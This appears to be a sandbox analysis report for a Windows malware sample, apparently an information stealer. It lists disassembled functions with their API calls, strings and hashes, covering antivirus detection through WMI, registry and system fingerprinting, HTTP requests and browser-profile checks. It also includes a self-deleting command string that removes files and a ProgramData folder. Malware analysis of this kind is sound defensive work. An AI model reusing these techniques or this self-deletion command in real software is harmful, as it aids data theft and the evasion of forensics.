Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$\x
API String ID: 442264750-1510654650
Opcode ID: 196554a47a95aea3e92c5a25c257ad09bb84b7a06f335cb362441dbe7c47c062
Instruction ID: 7ed613147d549b64fd27813156f75d57d984386b49f881f66156955146177f27
Opcode Fuzzy Hash: 196554a47a95aea3e92c5a25c257ad09bb84b7a06f335cb362441dbe7c47c062
Instruction Fuzzy Hash: B0511871901928AFDF21AF64EC89BEFBBB8FB08346F4100E5F549A6151D7705E818F50

Function 00091997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 0009199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00093F67,?,AV: ,000B68C4,Install Date: ,000B68B0,00000000,Windows: ,000B68A0,Work Dir: In memory,000B6888), ref: 000919AD
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000919BE
CoCreateInstance.OLE32(000B2F00,00000000,00000001,000B2E30,?), ref: 000919D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00091A0E
VariantInit.OLEAUT32(?), ref: 00091A5D

Part of subcall function 00091D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00091A80,?), ref: 00091D4A
Part of subcall function 00091D42: CharToOemW.USER32(?,00000000), ref: 00091D56

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

VariantClear.OLEAUT32(?), ref: 00091A8B

Strings

root\SecurityCenter2, xrefs: 000919F0
displayName, xrefs: 00091A6F
Unknown, xrefs: 00091A99
WQL, xrefs: 00091A28
Unknown, xrefs: 00091AA0
Select * From AntiVirusProduct, xrefs: 00091A23
Unknown, xrefs: 00091AB4

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 1092da1d12c18ecd17c52f71949933ca229d8a6a2ca64138b6c3e9c57fd7b4f3
Instruction ID: c5315d6b5155e25a15335010d90685e81d930369a3ca5b44ee1980fcf2dda42d
Opcode Fuzzy Hash: 1092da1d12c18ecd17c52f71949933ca229d8a6a2ca64138b6c3e9c57fd7b4f3
Instruction Fuzzy Hash: 9D318A70A44246BBDF20DBD1CC49EEFBBBCEFC5B10F104619F611AA1A0C6759940DB20

Function 00081284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000812A7
_memset.LIBCMT ref: 000812B6
lstrcatA.KERNEL32(?,000BA9EC), ref: 000812D0
lstrcatA.KERNEL32(?,000BA9F0), ref: 000812DE
lstrcatA.KERNEL32(?,000BA9F4), ref: 000812EC
lstrcatA.KERNEL32(?,000BA9F8), ref: 000812FA
lstrcatA.KERNEL32(?,000BA9FC), ref: 00081308
lstrcatA.KERNEL32(?,000BAA00), ref: 00081316
lstrcatA.KERNEL32(?,000BAA04), ref: 00081324
lstrcatA.KERNEL32(?,000BAA08), ref: 00081332
lstrcatA.KERNEL32(?,000BAA0C), ref: 00081340
lstrcatA.KERNEL32(?,000BAA10), ref: 0008134E
lstrcatA.KERNEL32(?,000BAA14), ref: 0008135C
lstrcatA.KERNEL32(?,000BAA18), ref: 0008136A
lstrcatA.KERNEL32(?,000BAA1C), ref: 00081378

Part of subcall function 00090C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00081385), ref: 00090C91
Part of subcall function 00090C85: HeapAlloc.KERNEL32(00000000,?,?,?,00081385), ref: 00090C98
Part of subcall function 00090C85: GetComputerNameA.KERNEL32(00000000,00081385), ref: 00090CAC

ExitProcess.KERNEL32 ref: 000813E3

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: b3a23cdda15bb0bb534096dba69d6c20efbc948b5ce45ef18b209516705a9f0e
Instruction ID: 872bed57fa9882648ce2ae313de5489de0f49cf36cf8e585f6933e38993d45eb
Opcode Fuzzy Hash: b3a23cdda15bb0bb534096dba69d6c20efbc948b5ce45ef18b209516705a9f0e
Instruction Fuzzy Hash: C84184B1E0422C67CB20EBB08C59FDB7BAC9F16350F500691E5D9E7041E774AB89CB91

Function 00091203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,000B670F,00000000,?,?), ref: 00091273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 000912B0
wsprintfA.USER32 ref: 000912DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 000912FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00091332
lstrlenA.KERNEL32(?), ref: 00091347

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,000B6E8C), ref: 000913DC
RegCloseKey.ADVAPI32(?), ref: 00091446
RegCloseKey.ADVAPI32(?), ref: 00091466
RegCloseKey.ADVAPI32(?), ref: 00091472

Strings

- , xrefs: 000913E6
%s\%s, xrefs: 000912D7
?, xrefs: 00091263

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 2394436309-3278919252
Opcode ID: fc594f72ce0b8bf950f4da0e05dab2f352694d5d651c8b0e393f8db9a1886b0a
Instruction ID: d1a6453f9124970217b03ab9df4034b956274e838a0134e4259f3ad460b6b482
Opcode Fuzzy Hash: fc594f72ce0b8bf950f4da0e05dab2f352694d5d651c8b0e393f8db9a1886b0a
Instruction Fuzzy Hash: 9761B67590012C9BEF21EB14ED84EDEB7B8EB45304F5142E6E608A7162DF30AE89DF50

Function 00098271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00098296
_memset.LIBCMT ref: 000982A5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 000982BA

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

ShellExecuteEx.SHELL32(?), ref: 00098456
_memset.LIBCMT ref: 00098465
_memset.LIBCMT ref: 00098477
ExitProcess.KERNEL32 ref: 00098487

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Strings

/c timeout /t 10 & del /f /q ", xrefs: 000982E5
" & rd /s /q "C:\ProgramData\, xrefs: 00098333
" & exit, xrefs: 00098389
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00098390
" & exit, xrefs: 000983DA

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 3744da5eb74f0945d44c55bbfa767333e5f40574cf17d46d23e6e8d972d57b2e
Instruction ID: c7587d0c25b3082506d82e46f9ce15766a5ed106e358b40a62f57710e3887665
Opcode Fuzzy Hash: 3744da5eb74f0945d44c55bbfa767333e5f40574cf17d46d23e6e8d972d57b2e
Instruction Fuzzy Hash: 285172B1D4022A9BCF61AF64CC86ADDB3BCAB44704F4201E5A758B7152DB306F869F54

Function 000909A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 000909D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00090A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00090A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00090A71
wsprintfA.USER32 ref: 00090AA7
lstrcatA.KERNEL32(00000000,000B6E3C), ref: 00090AB6

Part of subcall function 00091684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0009169F
Part of subcall function 00091684: _memset.LIBCMT ref: 000916CE
Part of subcall function 00091684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000916F6
Part of subcall function 00091684: lstrcatA.KERNEL32(?,000B6ECC,?,?,?,?,?), ref: 00091713

lstrlenA.KERNEL32(?), ref: 00090ACD

Part of subcall function 000923D5: malloc.MSVCRT ref: 000923DA
Part of subcall function 000923D5: strncpy.MSVCRT ref: 000923EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00090AF0

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Strings

w, xrefs: 00090B21
QuBi, xrefs: 00090A27
:\, xrefs: 00090A06
C, xrefs: 000909DF

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: w$:\$C$QuBi
API String ID: 1856320939-962629224
Opcode ID: 311d12c63b143cd33ec546965bf560b7d47d55d9d40d29794bf87000aa13b0f9
Instruction ID: 7fae983a3f0329fa1dcd1d4c0bc525356302d267ab5f4d8de2da66efbddbc90e
Opcode Fuzzy Hash: 311d12c63b143cd33ec546965bf560b7d47d55d9d40d29794bf87000aa13b0f9
Instruction Fuzzy Hash: 54418E71905228ABCF25AF74AC89ADEBBB8EF19344F0100E6F149E7121D6708F958F51

Function 000968C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00086963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000869C5
Part of subcall function 00086963: StrCmpCA.SHLWAPI(?), ref: 000869DF
Part of subcall function 00086963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086A0E
Part of subcall function 00086963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00086A4D
Part of subcall function 00086963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086A7D
Part of subcall function 00086963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00086A88
Part of subcall function 00086963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00086AAC

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0009691A
lstrlenA.KERNEL32(?), ref: 00096925

Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37

StrStrA.SHLWAPI(00000000,?), ref: 0009693A
lstrlenA.KERNEL32(?), ref: 00096949
lstrlenA.KERNEL32(00000000), ref: 00096962

Strings

ERROR, xrefs: 00096985
ERROR, xrefs: 0009697E
ERROR, xrefs: 00096977
ERROR, xrefs: 0009696D
ERROR, xrefs: 00096914

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: 60f81f21912bdd6b30cf87f3a54a84589bae9b0b3cffbe8bea09c0b53374170c
Instruction ID: 17f54ae964516102d12c6c786dc5fb332c2c807693ceeb7db5001b258630f954
Opcode Fuzzy Hash: 60f81f21912bdd6b30cf87f3a54a84589bae9b0b3cffbe8bea09c0b53374170c
Instruction Fuzzy Hash: 7721AC32D10104ABCF20BB74EC4A8EDBBF8BF15310B114166F959EB153DB369D45AB81

Function 0008EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0008EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0008EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0008EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0008EC33

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

StrCmpCA.SHLWAPI(0094C481), ref: 0008ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0008ED40

Strings

Stable\, xrefs: 0008EB71
firefox, xrefs: 0008EE17
Stable\, xrefs: 0008ED5B

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
